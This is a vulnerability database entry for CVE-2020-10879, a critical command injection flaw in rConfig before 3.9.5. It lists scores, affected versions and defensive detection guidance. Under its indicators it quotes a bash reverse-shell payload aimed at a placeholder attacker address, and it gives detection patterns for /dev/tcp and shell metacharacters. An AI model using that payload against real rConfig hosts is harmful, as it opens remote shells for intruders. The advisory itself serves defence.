cbcvebase.
CVE-2020-10879
published 2020-03-23

CVE-2020-10879: rConfig before 3.9.5 allows command injection by sending a crafted GET request to lib/crud/search.crud.php since the nodeId parameter is passed directly to the…

PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
83.86%
99.7th percentile
rConfig before 3.9.5 allows command injection by sending a crafted GET request to lib/crud/search.crud.php since the nodeId parameter is passed directly to the exec function without being escaped.

Affected

1 ranges
VendorProductVersion rangeFixed in
rconfigrconfig< 3.9.53.9.5

Detection & IOCsextracted from sources · hover to see the quote

url/lib/crud/search.crud.php
path/lib/crud/search.crud.php
command|| bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1 ;
  • Monitor GET requests to /lib/crud/search.crud.php where the 'nodeId' parameter contains shell metacharacters such as '||', '|', ';', '&', or bash redirection operators (e.g., '>&', '/dev/tcp/').
  • Detect URL-encoded bash reverse shell payloads in the 'nodeId' GET parameter of requests to search.crud.php, specifically patterns matching '%7C%7C+bash+-i' or '/dev/tcp/' after decoding.
  • Flag any rConfig instance running version 3.9.4 or earlier (prior to 3.9.5) as vulnerable to this unauthenticated-post-auth command injection.
  • ·The exploit was tested on CentOS 7 (1908); the bash reverse shell payload assumes a Linux target. Detection on Windows-based deployments may require different indicators.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.